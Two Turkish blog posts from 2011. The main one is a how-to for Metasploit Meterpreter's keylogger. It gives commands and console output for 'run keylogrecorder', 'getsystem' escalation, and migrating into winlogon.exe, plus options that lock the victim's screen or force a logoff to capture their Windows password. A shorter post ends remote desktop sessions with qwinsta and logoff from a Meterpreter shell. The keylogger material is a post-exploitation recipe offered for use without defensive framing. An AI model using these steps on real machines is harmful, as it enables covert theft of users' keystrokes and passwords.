23 Kasım 2011 Çarşamba

Meterpereter Keylogger Sorunu

Evet,bazen nedense keylogger işlemiyor bu gibi durumlarda meterpereter session ı açtıktan sonra


run keylogrecorder -c 0 komutunu çalıştırırsanız
 
[*]     explorer.exe Process found, migrating into 2812
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to 
C:/Users/Faruk/.msf3/logs/scripts/keylogrecorder/....txt
[*] Recording
 
şeklinde bir sonuç alırsınız
 
yada
 
meterpreter > getsystem
 ...got system (via technique 1).
meterpreter > run keylogrecorder -c 0 -t 15
[*]     spshell.exe Process found, migrating into 1980 
 
bunu deneyebilirsiniz...

windows şifresini almak için de önce winlogon.exe processine migrate olmanız gerekiyor.


meterpreter> ps
Process list
============
 
 PID   Name                 Arch  Session  User                         
 ---   ----                 ----  -------  ----                          
 0     [System Process]
 4     System               x86   0        NT AUTHORITY\SYSTEM
 544   smss.exe             x86   0        NT AUTHORITY\SYSTEM       
 608   csrss.exe            x86   0        NT AUTHORITY\SYSTEM         
 2976   winlogon.exe         x86   0        NT AUTHORITY\SYSTEM         
meterpreter > migrate 2976
[*] Migrating to 2976...
[*] Migration completed successfully.
 

 
c - açık olan oturumlardan hangisine bağlanmak istiyorsunuz.
    0 varsayılan ilk oturumdur.
l - kişiyi logoff olmaya zorlar bu asyede beklemeden windows 
    şifresini alabilirsiniz.
t - kaç saniyede bir keyleri almasını istiyorsunuz.


meterpreter> run keylogrecorder -c 1 -l -t 5
[*] Locking Screen...
[*] Screen has been locked
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/...
[*] Recording
 
 
 
 
 
 
Gönderen zaman: 00:24 0 yorum
Etiketler: , , , ,

22 Kasım 2011 Salı

Killing user session remotely – windows

Bazen açık kalan session lardan dolayı uzak masaüstü maximum sayıya ulaştı diye bir hata alıyoruz bu durumlarda meterpereter ile session açıp shell e düştükten sonra

qwinsta komutu ile tüm sessionları listeleyebilirsiniz.

 örn
 SESSIONNAME       USERNAME           ID  STATE   TYPE        DEVICE
>                                   sysadmin                  0  Disc    rdpwd              
 rdp-tcp                                                  65536  Listen  rdpwd              
 console                                                         4  Conn    wdcon              
 rdp-tcp#34                   sainflexdb                1  Active  rdpwd              
 rdp-tcp#35                   sainflexdb                2  Active  rdpwd              


sonra logoff [session id] /v komutuyla istediğiniz sessionı sonlandırabilirsiniz.

Gönderen zaman: 04:23 0 yorum
Kaydol: Kayıtlar (Atom)